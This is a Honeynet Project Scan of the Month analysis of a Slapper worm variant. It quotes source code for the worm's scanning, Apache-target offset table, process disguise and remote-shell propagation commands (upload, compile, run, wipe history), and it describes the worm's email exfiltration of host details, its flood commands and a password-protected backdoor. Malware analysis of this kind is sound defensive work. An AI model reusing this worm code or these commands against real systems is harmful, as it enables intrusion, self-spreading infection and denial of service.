Honeynet Project Scan of the Month - Scan 25 (November 2002)

Eloy Paris

<peloy at chapus dot net>

Abstract

The Honeynet Project's Scan of the Month for November 2002 requires the analysis of a file obtained from a compromised honeypot. The file turns out to be a gzip-compressed GNU tar archive that contains two C source files. I found out that these files contain the source code for a variant of the Slapper worm that hit the Internet on September 13, 2002 and that exploited the OpenSSL SSLv2 malformed client key remote buffer overflow vulnerability. In this paper I examine how the worm operates, what its capabilities are, and how it propagates and infects other machines.

"The greater the difficulty, the greater the glory" - Cicero

Table of Contents

1. Introduction

2. Initial Inspection

3. Analysis

3.1. Initialization

3.2. Main Loop

3.3. Worm Propagation

3.3.1. The Quest for Vulnerable Hosts
3.3.2. Penetrating Vulnerable Hosts
3.3.3. "You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not patching your machines!"

4. Taming the Worm

5. Questions

5.1. Question 1
5.2. Question 2
5.3. Question 3
5.4. Question 4
5.5. Question 5
5.6. Question 6
5.7. Question 7
5.8. Question 8
5.9. Question 9
5.10. Question 10
5.11. Question 11

A. Files

B. Worm Commands

C. References

D. Thanks

1. Introduction

This is a submission to the Honeynet Project November 2002 Scan of the Month. Here I analyze a variant of the Slapper worm that hit the Net on September 13, 2002 and that exploited the OpenSSL SSLv2 malformed client key remote buffer overflow vulnerability.

The analysis is in some parts very detailed. If you are a grader, have lots of submissions to read, and can't go over all the details, or are just a casual reader, feel free to go directly to Section 5, which contains the answers to all the questions of this challenge. The questions (and answers) provide a good summary of the must important aspects of the worm. However, just reading the answers is not the best way to understand some of the details nor the process I followed to analyze the worm, so I would encourage you to read the whole submission.

2. Initial Inspection

The first thing I need to do after downloading the only file (called .unlock) that the Honeynet Project has given us is to determine what type of file I am dealing with. The easiest way to do this is by running the Unix file command on it:

peloy@canaima:~$ file .unlock
.unlock: gzip compressed data, from Unix

This tells me that the file was compressed using Lempel-Ziv coding (LZ77). Now I can re-run the file command but this time specifying the -z switch to try to look inside compressed file:

peloy@canaima:~$ file -z .unlock
.unlock: GNU tar archive (gzip compressed data, from Unix)

The file command is telling me that the compressed file contains a GNU tar archive.

Finally, to find out the date in which the .unlock file was generated (information we will need to answer one of the Scan of the Month questions) I can use the ls command. As we can see below, the .unlock file was created on September 22, 2002 at 1:06 PM (we don't know the time zone).

peloy@canaima:~$ ls -l .unlock
-rw-r--r--    1 peloy    peloy       17973 2002-09-22 13:06 .unlock

With this new information we can now decompress (gzip's -d switch) the file to standard output (gzip's -c switch) and pipe the output to the tar command. We use the tar command's -t switch to list the contents of the archive:

peloy@canaima:~$ gzip -dc .unlock | tar tvf -
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c

Bingo! Now we know that we might be dealing we two C source files, one called .unlock.c and the other one called .update.c. We can even see the dates these two files were last modified. To extract the contents of the archive we just need to run the tar command with the -x switch.

3. Analysis

Analysis of this month's Scan of the Month is a lot easier than analysis of previous Scans of the Month and Honeynet Project's Challenges like Scan 22 and the Reverse Challenge. The reason it is easy to analyze this month's Scan of the Month is because we are getting the actual source code of the program we are concerned with. In the two other challenges I mentioned above, it was pretty hard to do the analysis because we were only given the binaries (executable files), so we needed to reconstruct symbol tables and decompile the programs. This took a considerable amount of time given that the process is highly manual and there are not good tools for reverse-engineering Unix binaries (save Dion Mendel's tools, which I use for Scan 22.)

To analyze what the worm does, how it propagates to other machines, how it operates, what capabilities it offers, and other details, I will go over the worm's source code. The format I will use will present a source code segment with callouts to comments that follow the code and that explain different features of the code segment. The number right before the comment is a hypelink, and clicking on it will take you to the specific line the comment refers to.

Just to provide a general idea or 20,000 feet view, the program structure is something like:

main()
{
  initialize();

  while (1) {
     select(timeout=2secs);
     every_60secs_task;
     every_3secs_task;
     every_10mins_task;
     scan_and_infect();
     peer_to_peer_network_housekeeping;
     switch (command) {
        command 1:
          handle_command1;
          break;
        command 2:
          handle_command2;
        udp DoS:
          do_udp_flood;
        tcp DoS:
          do_tcp_flood;
        dns DoS:
          do_dns_flood;
        .
        .
        .
        etc.
     }
  }
}

I'll go over each one of these parts in the next sections.

3.1. Initialization

1768 int main(int argc, char **argv) {
1769         unsigned char a=0,b=0,c=0,d=0;
1770         unsigned long bases,*cpbases;
1771         struct initsrv_rec initrec;
1772         int null=open("/dev/null",O_RDWR);
1773         uptime=time(NULL);
1774         if (argc <= 1) { 
1775                 printf("%s: Exec format error. Binary file not executable.\n",argv[0]);
1776                 return 0;
1777         }
1778         srand(time(NULL)^getpid());
1779         memset((char*)&routes,0,sizeof(struct route_table)*24);
1780         memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
1781         if (audp_listen(&udpserver,PORT) != 0) { 
1782                 printf("Error: %s\n",aerror(&udpserver));
1783                 return 0;

	The first thing the worm does is to check the number of arguments passed to it in the command line. The worm expects at least one argument, so if it is called without arguments it prints a non-sense error message and exits (line 1776.)
	The function `audp_listen()` is called to create a socket and bind to UDP port 4156 (the parameter PORT is a symbol defined in line 66 as "4156".) The socket, the port number, and other socket-related information is stored in the global variable `udpserver`, which is declared as struct ainst.

In the lines following the call to the audp_listen() function (lines 1785 to 1798) several structures used by the worm are initialized. One interesting structure that is initialized here is the array of IP addresses cpbases, which is initialized with the list of IP addresses that is passed to the worm on the command line:

1789         cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc); 
1790         if (cpbases == NULL) {
1791                 printf("Insufficient memory\n");
1792                 return 0;
1793         }
1794         for (bases=1;bases<argc;bases++) {
1795                 cpbases[bases-1]=aresolve(argv[bases]); 
1796                 relay(cpbases[bases-1],(char*)&initrec,sizeof(struct initsrv_rec)); 
1797         }

	The worm requests memory to store `argc` IP addresses. If memory is not available the worm exists printing the error message in line 1791.
	This is were the `cpbases` array is initialized. The function `aresolve()` just resolves a host name and returns the corresponding IP address.
	The function `relay()` is called. It is in this function that the worm generates its first network activity: the worm sends to each IP address or host name passed in the command line a packet that contains the following data: {tag=0x70, len=0, id=0}. As we shall see, this packet just announces the worm to other peers in the network. `relay()` calls `lowsend()`, which in turn does the actual send.

1799         dup2(null,0); dup2(null,1); dup2(null,2); 
1800         if (fork()) return 1;

Here the worm goes daemon. For this it duplicates the file descriptor null, which is associated with /dev/null, as file descriptors 0, 1, and 2, which correspond to standard input, standard output and standard error respectively.

Finally, in the next line (line 1800) the worm forks. If the fork is successful the child continues to run and the parent exits with a return code of 1. If the fork is not successful the worm exits with a return code of 1 as well.

1801 // aion
1802              mailme(argv[1]); zhdr(0); 
1803         for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; 
1804         for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; 
1805         strcpy(argv[0],PSNAME); 
1806
1807         a=classes[rand()%sizeof(classes)]; b=rand(); c=0; d=0; 
1808         signal(SIGCHLD, nas); signal(SIGHUP, nas);

	In line 1802 the worm calls the function `mailme()`, which does the following: Creates a temporary socket. Uses this socket to establish a TCP connection with port 25 (Simple Mail Transfer Protocol) of the host freemail.ukr.net Uses this TCP connection to send mail to `<aion@ukr.net>`. The host name used in the HELO SMTP command is test, and the sender used in the MAIL FROM SMTP command is test@microsoft.com. The e-mail does not have any headers and the body contains the following three lines: hostid: (decimal number) hostname: (string) att_from: (string) hostid and hostname are obtained via the `gethostid()` and `gethostname()` C library functions, and they refer to the host executing the worm. att_from is the only parameter passed to the `mailme()` function, and represents the first argument passed to the worm from the command like. This argument is an IP address. After the e-mail is sent, the function destroys the socket, which closes the TCP connection.
	Line 1803 just wipes out the string pointed by argv[0], which is the program name. The name is wiped out by writing zeroes to each byte in the string.
	Line 1804 also wipes a string, but in this case the one pointed by argv[1], which is the first parameter passed to the worm when it was invoked.
	In line 1805 the worm tries to obfuscate the program name by overwriting argv[0] with the string "httpd ". This way an administrator running the ps would think that a HTTP server process is running.
	As we will see later, the worm scans other networks to try to find other vulnerable hosts to which it can spread. In line 1807 the worm initializes the first two 16 bits of the IP networks it will scan. It does this by choosing a random number from the classes[] array for the first octect, and by choosing a completely random value for the second octect.
	Finally, in line 1808 the worm assigns the signal handler `nas()` to signals SIGCHLD and SIGHUP. `nas()` does not do anything so in fact these two signals are ignored if they are received.

Here ends the initialization section of the worm's code. In the next section I will go in detail over the main loop of the worm.

3.2. Main Loop

The main loop begins in line 1809. It is a big "while" loop that never exits. The first thing the worm does inside the main loop is to set a file descriptor set (stored in the variable read, declared as fd_set inside the main loop) so several sockets can be monitored with the select() function call:

1818                 FD_ZERO(&read);
1819                 if (udpserver.sock > 0) FD_SET(udpserver.sock,&read); 
1820                 udpserver.len=0; 
1821                 l=udpserver.sock; 
1822                 for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock > 0) { 
1823                         FD_SET(clients[n].sock,&read);
1824                         clients[n].len=0;
1825                         if (clients[n].sock > l) l=clients[n].sock;
1826                 }
1827                 memset((void*)&tm,0,sizeof(struct timeval));
1828                 tm.tv_sec=2; 
1829                 tm.tv_usec=0;
1830                 l=select(l+1,&read,NULL,NULL,&tm);

	The main socket is added to the file descriptor set.
	The number of bytes read is initialized to zero.
	Same thing for the file descriptors associated with other peers in the network: we add each peer's socket to the set of file descriptors to watch and set the number of bytes read to zero.
	The worm wants to wait two seconds for a change in any of the file descriptors `select()` is watching. Here this timeout is configured.

After select() is called in line 1830, the worm will execute three pieces of codes depending on whether specific time intervals have elapsed. The first piece of code is executed every 60 seconds, the second will be executed every 3 seconds, and the third every 10 minutes.

The code that is executed every 60 seconds is the following:

1849     timeout+=time(NULL)-start;
1850     if (timeout >= 60) {
1851       if (links == NULL || numlinks == 0) {
1852         memset((void*)&initrec,0,sizeof(struct initsrv_rec));
1853         initrec.h.tag=0x70;
1854         initrec.h.len=0;
1855         initrec.h.id=0;
1856         for (i=0;i<bases;i++) relay(cpbases[i],(char*)&initrec,
                 sizeof(struct initsrv_rec)); 
1857       }
1858       else if (!myip) {
1859         memset((void*)&initrec,0,sizeof(struct initsrv_rec));
1860         initrec.h.tag=0x74;
1861         initrec.h.len=0;
1862         initrec.h.id=0;
1863         segment(2,(char*)&initrec,sizeof(struct initsrv_rec)); 
1864       }
1865       timeout=0;
1866     }

If the worm does not know of other peers in the network (that is, if the variable links is NULL or if the variable numlinks is 0) the worm will do the same thing it did in line 1796 (see Section 3.1 above), which is to send a packet with the data {tag=0x70, id=0, len=0} to another IP in the virtual network.

Note that there is an off-by-one bug in this loop: the array cpbases[] was initialized with argc elements, but the loop runs from 1 to argc + 1 (bases equal argc + 1 because of a previous operation.) The result is that there is one extra UDP packet that is sent, but since it goes to 0.0.0.0 it ends up going to the local machine.

If the worm does not know of other peers in the network and will if the worm knows its IP address (variable myip is not zero) the worm send a packet with the data {tag=0x74, id=0, len=0}.

The code that is executed every 3 seconds (lines 1869 to 1893) handles the sending of messages in the message queue. This is because the worm maintains a queue of messages to send to other peers it knows about. In some cases the worm just sends the messages immediately but in others messages are just queued for later transmission.

The code that is executed every 6 seconds (lines 1896 to 1900) just sends information about the peer-to-peer network of infected machines from the point of view of the sending machine to a random peer. The work is done by the function broadcast()

In lines 1903 and 1905, the worm just checks if any of the sockets select() is watching has any data, i.e. if data has been received. If there is data these two lines just set the len of the structures the worm uses to keep track of connection state to AREAD.

Next, in line 1907, and extending to line 1938, the worm searches for remote machines it can infect. I go into the details of how the worm does this in Section 3.3.

After worm propagation has been taken care of, the worm seem to do some housekeeping tasks related to the peer-to-peer network. There can be up to 128 peers the worm is in touch with, and from line 1939 to line 2006, the worm performs tasks like adding and deleting peers to and from the internal list that keeps track of all connections. This list is stored in the array clients. I must confess that due to lack of time I did not go into the details of how the peer-to-peer network capabilities of the worm work.

Finally, in line 2008 the last logical section of the main loop is started. This last section will read any command read from UDP port 4156, and process it. One of the features of the worm is that it provides backdoor capabilities that support a variety of tasks. For example, people that know that the worm is executing on a specific machine can request the machine to launch UDP, TCP or DNS Denial of Service attacks against any specific host, can request that the worm runs a command on the infected machine, that the worm scans all files in the infected machine and send back a list of all e-mail addresses found, etc.

Appendix B contains a list of the commands the worm understands.

3.3. Worm Propagation

There are three aspects to the propagation of the worm to other machines: 1) search of remote machines to exploit (scanning of remote machines), 2) exploitation of a known vulnerability to get access to the remote host, and 3) replication of the worm to successfully compromised remote machines. I will go over each one of these aspects in the following sections.

3.3.1. The Quest for Vulnerable Hosts

As we shall see, the way the worm scans for other vulnerable hosts is simple. The code that scans remote hosts the worm can exploit begins in line 1907 and extends until line 1938. Here's what the scanning code does:

1907 #ifdef SCAN 
1908     if (myip) for (n=CLIENTS,p=0;n<(CLIENTS*2) && p<100;n++)
                if (clients[n].sock == 0) { 
1909       char srv[256];
1910       if (d == 255) { 
1911         if (c == 255) {
1912           a=classes[rand()%(sizeof classes)];
1913           b=rand();
1914           c=0;
1915         }
1916         else c++;
1917         d=0;
1918       }
1919       else d++;
1920       memset(srv,0,256);
1921       sprintf(srv,"%d.%d.%d.%d",a,b,c,d);
1922       clients[n].ext=time(NULL);
1923       atcp_sync_connect(&clients[n],srv,SCANPORT);
1924       p++;
1925     }
1926     for (n=CLIENTS;n<(CLIENTS*2);n++) if (clients[n].sock != 0) { 
1927       p=atcp_sync_check(&clients[n]);
1928       if (p == ASUCCESS || p == ACONNECT || time(NULL)-((unsigned long)clients[n].ext) >= 5)
                atcp_close(&clients[n]); 
1929       if (p == ASUCCESS) { 
1930         char srv[256];
1931         conv(srv,256,clients[n].in.sin_addr.s_addr);
1932         if (mfork() == 0) {
1933           exploit(srv);
1934           exit(0);
1935         }
1936       }
1937     }
1938 #endif

	All the scanning code is enclosed by a "#ifdef SCAN" construct. My guess is that this was put in place by the author of the worm to make debugging and testing easier. The symbol `SCAN` is obviously defined (in line 59.)
	The worm will scan consecutive IP addresses. The first IP address will have the form `a.b.c.d`, where `a` will be initially randomly set to one value from an array of pre-defined IP networks to scan (see line 291 for the actual declaration of the `classes[]` array), `b` will be set to a random value, and `c` and `d` will be set to zero. After initializing `a.b.c.d` as I just described, the worm will create chunks of 100 TCP sockets and `sockaddr` structures. Each `sockaddr` structure will have the destination IP address set to `a.b.c.d` and the port number set to 80. The creation of the sockets and the initialization of the `sockaddr` structures is actually done by the `atcp_sync_connect()` in line 1923.
	The way the `a.b.c.d` changes is as follows: if both `c` and `d` are equal to 255 it will reinitialize `a.b.c.d` as I described above. If only `d` is 255 then it will increment `c`. If neither `c` nor `d` is 255 then it will just increment `d`.
	Once 100 sockets and `sockaddr` have been created/initialized, the worm proceeds to check if the has open the port `SCANPORT`, where `SCANPORT` is a symbol defined in line 67 as 80, the Hyper Text Transfer Protocol (HTTP) port. The function that is called to determine if port 80 of the remote hosts is open is called `atcp_sync_check()`. This function just calls the standard sockets API function `connect()`. The parameters to the `connect()` call are extracted from the previously created sockets and sockaddr structures.
	If it was possible to establish a TCP connection with port 80 of the remote host, the TCP connection is closed by calling the function `atcp_close()`. This is not efficient at all since later on the worm will reconnect to try to exploit the remote host.
	If a specific host is found to have port 80 open, then an exploitation attempt is launched. Before launching an attack the worm forks another instance. This instance performs the attack, handles propagation of the worm if the attack is successful, and then exits. I'll explain the `exploit()` function below.

3.3.2. Penetrating Vulnerable Hosts

The function exploit() is very important because that is the one that launches an exploitation attempt, and spreads the worm if the attack is launched and is successful. The function begins in line 1697. Let's see what this function does (I'll just include the most important parts of it):

1697 void exploit(char *ip) {
1698   int port = 443;
1699   int i;
1700   int arch=-1;
1701   int N = 20;
1702   ssl_conn* ssl1;
1703   ssl_conn* ssl2;
1704   char *a;
1705
1706   alarm(3600);
1707   if ((a=GetAddress(ip)) == NULL) exit(0); 
1708   if (strncmp(a,"Apache",6)) exit(0); 
1709   for (i=0;i<MAX_ARCH;i++) { 
1710     if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
1711       arch=i;
1712       break;
1713     }
1714   }
1715   if (arch == -1) arch=9; 
1716
1717   srand(0x31337);
1718
1719   for (i=0; i<N; i++) { 
1720     connect_host(ip, port);
1721     usleep(100000);
1722   }
1723
1724   ssl1 = ssl_connect_host(ip, port); 
1725   ssl2 = ssl_connect_host(ip, port);
1726
[...]
1751
1752   send_client_finished(ssl2);
1753   get_server_error(ssl2);
1754
1755   sh(ssl2->sock); 
1756
1757   close(ssl2->sock);
1758   close(ssl1->sock);
1759
1760   exit(0);
1761 }

The first thing exploit() does is to call the GetAddress() function. GetAddress() in turns establishes a TCP connection with port 80 of the remote host. Once the connection is established, it sends the bogus string "GET / HTTP/1.1\r\n\r\n". It is bogus because it should not send a second "\r\n" pair since HTTP version 1.1 requires sending "Host: <hostname>" after the "GET" request. But this doesn't matter because the end goal is to make the remote web server spit an error message that can be used to identify what the web server software is!!!.

When the remote web server spits the error message, GetAddress() will look for the string "Server: xxxx", and return a pointer to "xxxx". The idea is that exploit() will then decide, based on whether the remote web server is Apache, if it will launch the exploitation attempt. An example of what a remote web server running Apache would return is:

peloy@canaima:~$ nc localhost 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Wed, 27 Nov 2002 05:21:56 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

If the remote host is not running Apache, the the worm gives up and exits (but remember that this is a forked process, and the parent is still running and scanning other hosts.)

Here the worm is trying to maximize its chances of success by determining what specific version of Apache, and what Linux distribution, are running on the remote host. By identifying precisely these two the worm can tune one exploit-specific parameter that will improve the chances of success. The different "architectures" the worm knows about are stored in the architectures[] array. There are 23 different combinations of Linux distributions and Apache versions. The Linux distributions are Gentoo, Debian, RedHat, SuSE, Mandrake, and Slackware. Apache versions range from 1.3.6 to 1.3.26. The actual list of architectures is:

   1239 #define MAX_ARCH 21
   1240
   1241 struct archs {
   1242         char *os;
   1243         char *apache;
   1244         int func_addr;
   1245 } architectures[] = {
   1246         {"Gentoo", "", 0x08086c34},
   1247         {"Debian", "1.3.26", 0x080863cc},
   1248         {"Red-Hat", "1.3.6", 0x080707ec},
   1249         {"Red-Hat", "1.3.9", 0x0808ccc4},
   1250         {"Red-Hat", "1.3.12", 0x0808f614},
   1251         {"Red-Hat", "1.3.12", 0x0809251c},
   1252         {"Red-Hat", "1.3.19", 0x0809af8c},
   1253         {"Red-Hat", "1.3.20", 0x080994d4},
   1254         {"Red-Hat", "1.3.26", 0x08161c14},
   1255         {"Red-Hat", "1.3.23", 0x0808528c},
   1256         {"Red-Hat", "1.3.22", 0x0808400c},
   1257         {"SuSE", "1.3.12", 0x0809f54c},
   1258         {"SuSE", "1.3.17", 0x08099984},
   1259         {"SuSE", "1.3.19", 0x08099ec8},
   1260         {"SuSE", "1.3.20", 0x08099da8},
   1261         {"SuSE", "1.3.23", 0x08086168},
   1262         {"SuSE", "1.3.23", 0x080861c8},
   1263         {"Mandrake", "1.3.14", 0x0809d6c4},
   1264         {"Mandrake", "1.3.19", 0x0809ea98},
   1265         {"Mandrake", "1.3.20", 0x0809e97c},
   1266         {"Mandrake", "1.3.23", 0x08086580},
   1267         {"Slackware", "1.3.26", 0x083d37fc},
   1268         {"Slackware", "1.3.26",0x080b2100}
   1269 };

Notice here that if the worm can accurately identify a specific architecture, it defaults to the 9th entry in the architectures array, which is RedHat and Apache 1.3.23.

Here the worm is getting into exploit-specific territory: the worm exploits the vulnerability of OpenSSL that was announced by the CERT/CC on July 30, 2002 (see the references in Appendix C for links to online documents that contain more details). So, the worm needs to connect to port 443 (HTTPS) to be able to exploit the vulnerability. What the worm is doing here is attempting to open a connection to port 443 of the remote host. It will retry 20 times, at 100 milliseconds between retries. Inside the function connect_host() we can see that if the connection fails, the worm will exit.

Between lines 1724 and 1753 is where the actual exploitation of the OpenSSL vulnerability takes place. I won't go in details here because this is better explained elsewhere (again, please refer to Appendix C for links to online documents that explain well the details of this vulnerability.)

Finally, here the remote host has been compromised! The worm is in and now is time to perpetuate the species!!! The function sh() is the responsible of propagating the worm to the compromised machine. I will explain what this function does in the next section.

3.3.3. "You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not patching your machines!"

Once a vulnerable host has been successfully compromised it is time for the worm to preserve the species. Worm propagation is done by the sh() function, which is called after the OpenSSH attack has been successful. At this point, the worm has an open shell in the remote host, and is ready to start sending the commands that will propagate the worm. Let's see what it does in detail:

1403 int sh(int sockfd) {
1404   char localip[256], rcv[1024];
1405   fd_set rset;
1406   int maxfd, n;
1407
1408   alarm(3600);
1409   conv(localip,256,myip); memset(rcv,0,1024);^M
1410 // aion
1411   writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
1412     "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
1413     "exec bash -i\n");
1414   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1415                 "       /tmp/httpd /tmp/update /tmp/.unlock;\n"); 
1416   writem(sockfd,"cat > /tmp/.unlock.uu && __eof__; \n"); 
1417   zhdr(1);
1418   encode(sockfd); 
1419   zhdr(0);  
1420   writem(sockfd,"__eof__\n"); 
1421   writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
1422                 "tar xzf /tmp/.unlock -C /tmp/;              "
1423     "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
1424     "gcc -o /tmp/update /tmp/.update.c;\n"); 
1425   sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip); 
1426   writem(sockfd,rcv); sleep(3);
1427   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1428                 "       /tmp/httpd /tmp/update; exit; \n"); 
1429   for (;;) {
1430     FD_ZERO(&rset);
1431     FD_SET(sockfd, &rset);
1432     select(sockfd+1, &rset, NULL, NULL, NULL);
1433     if (FD_ISSET(sockfd, &rset)) if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) return 0;
1434   }
1435 }

	The worm will generate these files while propagating itself to the remote compromised machine: `/tmp/.unlock.uu`, `/tmp/.unlock.c`, `/tmp/.update.c`, `/tmp/httpd`, `/tmp/update`, and `/tmp/.unlock`. Here the worm is just deleting these files (just in case they exist) to make sure that nothing will stomp on the propagation process.
	The worm starts writing to `/tmp/.unlock.uu`. The worm is using a "here document" and the cat command to create the file. The remote shell will stop writing data to the `/tmp/.unlock.uu` file as soon as it sees the string "__eof__" (see bash's man page for details on how "here documents" work).
	The `encode()` function will take the worm source, which is stored in the compressed GNU tar archive `/tmp/.unlock`, "uuencode" it, and send it to the remote shell by just "pasting" the data to standard output. The worm uses the uuencode enconding method to be able to transmit a binary file (the compressed GNU tar archive) over a over transmission medium that does not support other than simple ASCII data (uuencoding converts a binary file to ASCII data.) The worm can't just transmit the GNU tar archive because the shell and the remote terminal would interpret some of the data as control characters and the file transfer would fail.
	The worm writes "__eof__" to tell the remote shell that it is done sending data. With this, the file `/tmp/.unlock.uu` is fully created and the worm is ready for the next step.
	The worm sends several commands in one line to the remote shell. These commands will decode the uuencoded file, untar it, and then compile the two C source code files in the tar archive. The tools used in this process are the uudecode command, the tar command, and the GNU C Compiler gcc, all of which are available in most Linux installations by default.
	The worm runs the two binaries produced. Now a new instance of the worm is running on the remote machine. This instance will start searching for other machines to infect.
	After waiting for three seconds, the worm finally deletes all the files used in the propagation process, except the file `/tmp/.unlock`, which, as I already mentioned, is the compressed GNU tar archive that contains the worm source, and that is obviously needed to propagate the worm to other machines.

With this, I have finally covered all the details regarding how the worm propagates to other machines.

4. Taming the Worm

After I studied the worm and had a good understanding of what it does I decided to have a little bit of fun with it. For this I ran the worm on a machine connected to a network that is disconnected from the Internet. I also wrote a small C program to control the worm. The control program allowed me to send commands to the worm, and then I observed the activity generated by the worm with a sniffer like tcpdump.

Using the control program and observing the network traffic I was able to discover some of the bugs I have pointed out elsewhere in this document.

Here's an example of how the control program looks:

Agent address is 10.10.10.16

[0] Enter agent IP address
[1] Run a command on the agent
[2] UDP flood
[3] TCP flood
[4] DNS flood
[5] Scan remote files for e-mail addresses
[6] Exit

Enter option:

5. Questions

5.1. Question 1

Q: Which is the type of the .unlock file? When was it generated?

A: As I showed in Section 2, the .unlock file is a compressed GNU tar archive. The tar archive contains only two files, called .unlock.c and .update.c, which are C source files. The compressed GNU tar archived was generated on September 9, 2002 at 1:06 PM.

5.2. Question 2

Q: Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

A: By examining the .unlock.c file we can guess that the author of the worm is an individual that uses the IRC alias contem on the EFNet IRC network. We can see that in the first lines of the program:

1 /******************************************************************
2  *                                                                *
3  *           Peer-to-peer UDP Distributed Denial of Service (PUD) *
4  *                         by contem@efnet                        *
5  *                                                                *
[...]

However, the file we are looking at was modified by an individual that goes by the alias "aion", and whose e-mail address is aion@ukr.net.

[...]
37 *                                                                *
38 *  some modification done by aion (aion@ukr.net)                 *
39 ******************************************************************/
[...]

The .unlock.c file was generated on September 20, 2002 at 9:28 AM, and the .update.c file was generated on September 19, 2002 at 5:57 PM. Since the compressed tar archive was generated two days later (on September 22, 2002) I would say that the creation dates of the C source files are compatible with the creation date of the tar archive (in addition to the timestamps of the files, in the .unlock.c file, the symbol VERSION is declared in line 71 as "20092002", which seems to imply that the version number was chosen based on the day the code was released - September 20, 2002.)

5.3. Question 3

Q: Which process name is used by the worm when it is running?

A: Line 78 of .unlink.c contains the following symbol definition:

78 #define PSNAME          "httpd "

As I mentioned in Section 3.1, in lines 1803-1804, very close to the beginning of main(), the worm clears the program name as well as all the parameters passed through the command line by zeroing out the strings pointed by the pointers in the argv array.

Then, in line 1805, the worm calls the strcpy() C library function to copy the symbol PSNAME to the string pointed by the argv[0] pointer, which happens to be the program's name.

The end result is that the worm will be obfuscating the name of its process so an administrator would only see the process name "httpd" when the ps command is run.

5.4. Question 4

Q: In which format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

A: As I explained in Section 3.3.3, the worm uses the command cat and the "here document" syntax of the bash shell to copy the compressed GNU tar archive that contains the worm's source code to the new compromised machine. Since the worm is just sending the data to the standard output of the remote shell, it can't just copy the tar archive as it is because it contains binary data that could be interpreted as shell meta-characters or terminal control data. For this reason, the worm uuencodes the file and transmit the resulting data, which is just regular ASCII text.

The files that are creating during the worm propagation process are:

After the worm executes itself in the remote machine, the only file that remains is /tmp/.unlock, the compressed GNU tar archive that contains the worm's source code. All other files are deleted.

5.5. Question 5

Q: Which port is scanned by the worm?

A: The worm scans for TCP port 80, the Hyper Text Transfer Procotol port. If this port is found open, i.e. a TCP connection was successfully established, the worm proceeds to launch the exploit. The actual scan takes place in line 1923, where the worm executes atcp_sync_connect(&clients[n],srv,SCANPORT). SCANPORT is a symbol defined as "80" at the beginning of the worm's C source file.

5.6. Question 6

Q: Which vulnerability the worm tries to exploit? In which architectures?

A: The worm exploits the OpenSSL SSLv2 malformed client key buffer overflow vulnerability, which, as we have seen, allows remote exploitation. I will not go into in details here since excellent references to this vulnerability are available on the web, and they explain the problem better than what I could. Check the references in Appendix C.

Once a host has been found to have port 80 open, the worm tries to exploit the vulnerability by launching an attack again the HTTPS port, which on most Apache implementations uses the OpenSSL libraries.

As for the "architectures" the worm tries to exploit, "architectures" is not the correct word (although that is the word used in the C source code.) The exploit the worm uses works only on the Intel i386 family, no Sparcs, no PowerPCs, no ia64, no anything else (the worm will try to exploit all other architectures as long as it finds open TCP port 80, but the exploit will not succeed.) Now, there are several "targets" the worm knows about and that guarantee the success of the exploitation. For these known "targets", the worm knows it can tune an exploitation parameter so the exploit succeeds. The different "targets" the worm knows about are stored in the architectures[] array. There are 23 different combinations of Linux distributions and Apache versions. The Linux distributions are Gentoo, Debian, RedHat, SuSE, Mandrake, and Slackware. Apache versions range from 1.3.6 to 1.3.26 (see Section 3.3.2 or line 1241 of .unlock.c for the actual declaration of the architectures[] array.)

5.7. Question 7

Q: What kind of information is sent by the worm by email? To which account?

A: As I mentioned in Section 3.1, the worm sends an e-mail to the address <aion@ukr.net>. It sends the e-mail by establishing a direct TCP connection to port 25 (SMTP) of the host freemail.ukr.net, and by pretending to be <test@microsoft.com>.

The information sent by the worm is just:

hostid: (decimal number)
hostname: (string)
att_from: (string)

hostid and hostname are obtained via the gethostid() and gethostname() C library functions, and they refer to the host executing the worm. att_from is the only parameter passed to the mailme() function, and represents the first argument passed to the worm from the command like. This argument is an IP address.

5.8. Question 8

Q: Which port (and protocol) is used by the worm to communicate to other infected machines?

A: The worm uses UDP port 4156 to talk to other peers. In the C source code, the symbol PORT is used, and it is defined as "4156" at the beginning of the C source file.

5.9. Question 9

Q: Name 3 functionalities built in the worm to attack other networks.

A: The worm can be remotely programmed to generate three types of denial of service (DoS) attacks. The three types are UDP flood, TCP flood, and DNS flood. The UDP and TCP floods are intended to be used against any host, and the DNS flood is intended to be used against DNS servers since it sends DNS queries to the DNS port (UDP 53) of the specified IP address.

Because of the way the worm communicates with other infected machines, it is easy to use these attacks to create a major Distributed Denial of Service Attack (DDoS), where hundreds or thousands of machines create chaos by DoS'ing one or more hosts.

I personally tested the three attacks, as I mentioned in Section 4. The UDP and TCP attacks worked fine (well, the program is a bit buggy, but the attacks worked more or less.) The DNS attack seemed to have a bit of problems.

5.10. Question 10

Q: What is the purpose of the .update.c program? Which port does it use?

A: .update.c is a little program written not by the original worm author but by aion <aion@ukr.net>, the (apparently 21-year old) person that modified the original worm, and that just provides a shell on demand on TCP port 1052. To get a shell on a machine running this program one needs to provide the password "aion1981" as soon as the TCP connection with port 1052 is established. This in theory, though, since the program as it is has a critical bug:

52         for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
53         {
54           soc_cli = accept(soc_des,
55                       (struct sockaddr *) &client_addr,
                         sizeof(client_addr)); 
56           if (soc_cli > 0)
57           {
58             if (!fork()) {

